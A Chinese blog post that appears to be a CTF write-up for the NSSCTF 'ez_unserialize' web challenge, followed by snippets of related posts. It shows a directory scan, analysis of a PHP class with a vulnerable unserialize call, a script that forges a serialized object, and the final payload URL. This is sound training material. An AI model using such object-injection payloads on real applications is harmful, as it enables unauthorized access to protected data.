NSSCTF | [SWPUCTF 2021 新生赛]ez_unserialize

最新推荐文章于 2024-05-20 20:11:47 发布
最新推荐文章于 2024-05-20 20:11:47 发布
阅读量914 收藏 11
点赞数 13
文章标签: php 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80946742/article/details/138891534
版权

打开题目,发现是一个GIF动图页面,什么都没有。我们来查看一下源代码,看看有没有什么发现

其实只要足够了解网站的构成,看到绿色的注释字样就能知道它这里在提示robots.txt文件。

但是对于小白来说,也不知道它是什么,那我们最简单粗暴地方式就是来扫一扫这个网站看看有没有别的页面。这里使用的扫描工具是dirsearch目录扫描工具。

python dirsearch.py -u http://node4.anna.nssctf.cn:28286/

可以看到扫描出来的robots.txt文件。 robots.txt 是一个放置在网站根目录下的文本文件,它用于指导网络爬虫(如搜索引擎的机器人)哪些页面可以抓取,哪些页面不应该被访问。通过这个文件,网站管理员可以控制爬虫的行为,保护网站的某些内容不被索引,同时也有助于管理网站的流量和服务器负载。它是任何人都可以访问的文件,只要存在。

我们来查看一下这个网站的robots.txt

可以看到网站还有一个文件cl45s.php,我们来访问一下

可以看到一个php脚本,简单分析一下

这个脚本是用PHP编写的,可能属于一个简单的网站或网络应用的一部分,用于演示如何通过PHP对象的序列化和反序列化来触发特定的行为。下面是对脚本各部分的解释:

1. `error_reporting(0);`:这行代码关闭了PHP的错误报告,这意味着即使脚本中存在错误,也不会显示任何错误信息。

2. `show_source("cl45s.php");`:这行代码显示文件 "cl45s.php" 的源代码。`show_source` 是 `highlight_file` 函数的同义词,用于高亮显示指定文件的源码。

3. 接下来定义了一个名为 `wllm` 的类,包含两个公开属性 `admin` 和 `passwd`,以及一个构造方法和一个析构方法:
   - 构造方法 `__construct()`:这是一个魔术方法,当一个新的 `wllm` 对象被创建时,会自动调用此方法。它将 `admin` 初始化为字符串 "user",将 `passwd` 初始化为 "123456"。
   - 析构方法 `__destruct()`:这是另一个魔术方法,当 `wllm` 对象被销毁时,会自动调用此方法。如果 `admin` 属性等于 "admin" 且 `passwd` 属性等于 "ctf",脚本会包含 "flag.php" 文件,并显示其 `$flag` 变量的内容。否则,会输出 `admin` 和 `passwd` 属性的值和字符串 "Just a bit more!"。

4. `$p = $_GET['p']; unserialize($p);`:这两行代码从URL参数 `p` 中获取一个字符串,并尝试将其反序列化为一个 `wllm` 对象。由于在PHP中对象的反序列化会自动调用对象的析构方法(如果脚本生命周期结束或对象不再被引用时),这可能是一个对象注入漏洞的示例。

这个脚本涉及到的关键安全概念是反序列化漏洞,攻击者可以通过精心构造的序列化字符串来操纵对象的状态,从而可能触发未授权的代码执行。在这个例子中,攻击者可能会尝试提供一个序列化的 `wllm` 对象,其 `admin` 和 `passwd` 属性被设置成了 "admin" 和 "ctf",以此来获取 "flag.php" 中的敏感信息。

编写一个反序列化脚本来解决这个问题

<?php

class wllm {
    public $admin;
    public $passwd;

    public function __construct($admin, $passwd) {
        $this->admin = $admin;
        $this->passwd = $passwd;
    }
}

// 创建一个wllm类的对象,设置admin为admin,passwd为ctf
$obj = new wllm("admin", "ctf");

// 序列化对象
$serialized_obj = serialize($obj);

// 输出序列化后的字符串,可以通过GET参数p传递给原脚本
echo "http://node4.anna.nssctf.cn:28516/cl45s.php/?p=" . urlencode($serialized_obj);

?>

在线运行这个脚本

在线运行PHP

访问运行结果中的地址就可以得到flag

http://node4.anna.nssctf.cn:28516/cl45s.php/?p=O%3A4%3A%22wllm%22%3A2%3A%7Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22passwd%22%3Bs%3A3%3A%22ctf%22%3B%7D

本题完。

Hackerdallas
关注
网络安全 | CTF】攻防世界 Web_php_unserialize 解题详析
等风来
05-28 3824
这段代码接收参数 var,使用 base64_decode 函数对 var 进行解码,然后通过 preg_match 函数判断是否包含类似 o:2的字符串,如果存在则中断程序执行,否则调用 @unserialize 函数进行反序列化操作。这段代码首先定义了一个名为 Demo 的类,包含了一个私有变量 $file 和三个魔术方法 __construct()、__destruct() 和 __wakeup()。3、private在变量名前添加标记\00(classname)\00,长度+2+类名长度,如。
NSSCTF ez_unserialize
m0_49257076的博客
11-02 1135
打开题目是胡桃摇的表情包(手动滑稽????),下面是“题目在哪” 这边是上手直接使用蚁剑扫描得到的robots.txt文件,然后打开之后有cl45s.php文件,访问之后可以看到题目的源码 观察源码就知道是一个简单的unserialize,手写一下(菜狗枯了) <?php class wllm{ public $admin; public $passwd; public function __construct(){ $this->admin ...
[SWPUCTF 2021 新生]ez_unserialize
最新发布
分享
05-20 481
php反序列化!
[NSSCTF]-Web:[SWPUCTF 2021 新生]ez_unserialize解析(反序列化修改属性)
2301_79326813的博客
02-28 490
查看网页这里可以查看robots.txt题目文件如下。
[SWPUCTF 2021 新生] ez_unserialize
Welcome To Myon'Blog !
07-05 2202
链尾(就是最终我们想要利用的地方),在echo $flag 并且include了flag.php 往上看,发现只需要满足 再往上看,发现执行这条语句我们需要触发__destruct()函数 __destruct是析构函数,会在对象的所有引用被删除或者当对象被显式销毁时自动执行,比如new完一个对象,当创建完成之后就不引用了,如果有赋值指向就会立马丢弃,触发destruct函数。 这里还有一个__construct()构造函数,它是在实例化一个对象(即new时)会自动调用。
NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(WEB篇)
jameshuangchuan的博客
08-08 2970
此处主要在NSSCTF平台()上开展刷题。
[SWPUCTF 2021 新生]
snowlyzz的博客
09-11 1541
。。
CTF笔记 [SWPUCTF 2021 新生]pop
qq_51248658的博客
10-28 2890
这一类题目比较考验对一段代码的逻辑方面的理解,通过利用魔数方法进行互相调用,形成一条链子,利用这条链子将对象联系起来去拿flag。
[SWPUCTF 2021 新生]ez_unserialize-------WP
pythllc的博客
10-22 311
Robots 协议(也称为爬虫协议、机器人协议等)的全称是 “网络爬虫排除标准”(Robots Exclusion Protocol),网站通过 Robots 协议告诉搜索引擎哪些页面可抓,哪些页面不能抓。复制源码,把不需要的部分注释掉,再补充序列化的代码,将admin和passwd的值改为触发if条件的值,即可得到payload。3、看到可疑的php文件,访问一下,得到源码,下面就是代码审计了。当然也可以直接用御剑扫后台,这里的flag.php进不去。发现disallow,说明应该和robots有关。
DACTF—Ezunserialize
ro4lsc的博客
05-07 7505
DACTF—Ezunserialize(PHP反序列化字符逃逸) 这个题是我在后再进行学习的,所以自己在本地复现了一下环境。 <?php show_source("index.php"); function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function r...
SWPUCTF 2021 新生-WEB部分wp
m0_74606212的博客
09-23 722
SWPUCTF 2021 新生-WEB部分wp
攻防世界web_php_unserialize
06-28
### 回答1: 攻防世界web_php_unserialize是一个关于PHP反序列化漏洞的题目,需要掌握PHP反序列化漏洞的原理和利用方法。在这个题目中,可能会给出一个序列化的字符串,需要将其反序列化并进行一些操作,最终达到获取flag的目的。这个题目需要掌握PHP的序列化和反序列化函数,以及对序列化字符串的解析能力。 ### 回答2: web_php_unserialize指的是PHP反序列化漏洞。序列化是指将对象转换为字节流的过程,反序列化则是将字节流还原为原始对象的过程。PHP序列化对于数据的传输和存储非常方便,但是如果在执行反序列化过程中存在漏洞,就会导致恶意攻击者能够注入恶意代码,并可能导致代码执行、文件读写、远程代码执行等危险后果。攻防世界中的web_php_unserialize就是通过挖掘实际漏洞并利用它们对目标进行攻击的比。 攻防世界中的web_php_unserialize通常会考查参者对PHP反序列化漏洞的深入理解和实际应用能力。比中的攻击场景可能会包括以下几个方面: 1. 对序列化字符串的解析和理解。参者需要清楚地知道序列化字符串中不同数据类型的表示方法,包括字符串、数组、对象等。 2. 对序列化字符串中的数据类型和值进行篡改。恶意攻击者通常会利用序列化字符串的可篡改性注入恶意代码或者修改重要数据,参者需要在比中证明自己能够精准地修改序列化字符串中的数据类型和值。 3. 对反序列化函数的使用和理解。PHP反序列化漏洞很多都是由于对反序列化函数的不当使用导致的。参者需要清楚地知道反序列化函数参数的含义以及如何正确使用反序列化函数。 4. 对代码的理解和审计。比中可能会给出一些被漏洞的代码,参者需要仔细地审计代码并找出漏洞的具体原因。 总的来说,攻防世界中的web_php_unserialize旨在锻炼参者的漏洞挖掘和漏洞利用能力,并通过挖掘实际漏洞来理解和掌握漏洞的本质和原理。 ### 回答3: 攻防世界web_php_unserialize是一种基于PHP反序列化漏洞的CTF题目。这个题目主要考察选手对于PHP反序列化漏洞的理解和应用能力。 在一般的PHP应用程序中,序列化是将一个对象或一组数据转换成一个数据流的过程,反序列化则是将这个数据流转回成对象或一组数据。反序列化漏洞是指当应用程序在反序列化过程中没有对数据流进行足够的验证和过滤,导致攻击者可以在数据流中注入恶意代码,以此来执行代码并最终造成攻击。这种漏洞在很多PHP应用程序中都存在,而攻防世界web_php_unserialize就是基于这个漏洞设计的一道CTF题目。 这个题目的主要思路是通过构造一个特定的序列化数据,并将其作为参数提交给目标站点。该序列化数据包含了一个恶意代码,在反序列化时可以执行恶意代码,从而完成攻击。选手需要先了解序列化和反序列化的原理,然后使用PHP代码构造一个带有恶意代码的序列化数据,成功利用反序列化漏洞执行代码并获取到flag。 这道题目对于选手的PHP语言理解和代码能力有一定的要求,同时也需要选手在考虑漏洞时具备一定的克制能力,对于数据的过滤和验证也需要有一定的认识。通过挑战攻防世界web_php_unserialize,选手可以深入了解PHP反序列化漏洞的原理和应用,有效提高自己的防御意识和CTF能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值